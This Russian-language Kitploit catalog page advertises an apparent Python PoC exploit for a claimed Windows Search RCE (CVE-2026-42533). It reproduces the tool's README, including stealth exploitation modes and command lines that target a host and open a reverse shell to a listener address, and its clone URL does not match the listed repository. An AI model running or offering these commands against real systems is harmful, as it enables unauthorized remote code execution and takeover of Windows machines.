Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42533 — Эксплойт PoC для конкретной CVE, написанный на Python, для проверки уязвимостей и тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/leeyoonjoo/cve-2026-42533
Анализ уязвимостейЭксплуатацияТестирование на Проникновение
GitHubleeyoonjoo/cve-2026-42533

CVE-2026-42533

Эксплойт PoC для конкретной CVE, написанный на Python, для проверки уязвимостей и тестирования безопасности.

Репозиторий
23 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-42533

CVE-2026-42533 — это эксплойт для критической уязвимости удалённого выполнения кода (RCE) в службе Windows Search (WSS). Данный инструмент автоматизирует эксплуатацию уязвимости CVE-2026-42533 и поддерживает несколько режимов эксплуатации.

📜 Описание

CVE-2026-42533 — критическая уязвимость удалённого выполнения кода в службе Windows Search (WSS). Уязвимость связана с некорректной обработкой специально сформированных запросов. Успешная эксплуатация позволяет неаутентифицированному удалённому злоумышленнику выполнить произвольный код в контексте целевой системы.

Данный PoC-эксплойт реализует несколько методов эксплуатации:

  • Classic — стандартная эксплуатация через HTTP.
  • Stealth HTTP — эксплуатация с расширенным логированием и настраиваемыми параметрами.
  • Stealth RPC — эксплуатация на основе RPC (требуется скомпилированный InvokeWinRM).

✨ Возможности

  • Автоматизация эксплуатации CVE-2026-42533.
  • Поддержка нескольких режимов эксплуатации.
  • Встроенный обработчик для reverse shell.
  • Настраиваемые параметры (цель, порт, полезная нагрузка и т. д.).
  • Автоматическое резервное копирование реестра при использовании -stealth-rpc.

🚀 Установка

Клонируйте репозиторий и перейдите в каталог инструмента:

root@kitploit:~
git clone https://github.com/example/CVE-2026-42533.git
cd CVE-2026-42533

Установите зависимости:

root@kitploit:~
pip install -r requirements.txt

📖 Использование

Основное использование

root@kitploit:~
python CVE-2026-42533.py --target <IP-адрес> --lhost <IP-адрес> --lport <порт>

Режим Classic

root@kitploit:~
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode classic

Режим Stealth HTTP

root@kitploit:~
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode stealth-http

Режим Stealth RPC

root@kitploit:~
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode stealth-rpc --rpc-dll InvokeWinRM.dll

⚙️ Параметры

ПараметрОписаниеПо умолчанию
--targetIP-адрес или имя хоста цели.Обязательный
--lhostIP-адрес для reverse shell.Обязательный
--lportПорт для reverse shell.4444
--exploit-modeРежим эксплуатации: classic, stealth-http, stealth-rpc.classic
--rpc-dllПуть к DLL для режима stealth-rpc.InvokeWinRM.dll

📁 Структура проекта

root@kitploit:~
CVE-2026-42533/
├── CVE-2026-42533.py        # Основной скрипт эксплойта
├── InvokeWinRM.dll          # (Необязательно) DLL для режима Stealth RPC
├── requirements.txt         # Зависимости Python
├── README.md                # Документация
└── LICENSE                  # Лицензия

🛡️ Обработчик

Инструмент автоматически запускает обработчик для reverse shell после отправки полезной нагрузки. Обработчик прослушивает указанный --lport и предоставляет интерактивную оболочку.

⚠️ Дисклеймер

Данный инструмент предназначен только для образовательных целей и тестирования на проникновение в рамках авторизованных сред. Автор не несёт ответственности за любое неправомерное использование. Не используйте его в системах без явного разрешения.

📄 Лицензия

Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.

Скачать инструмент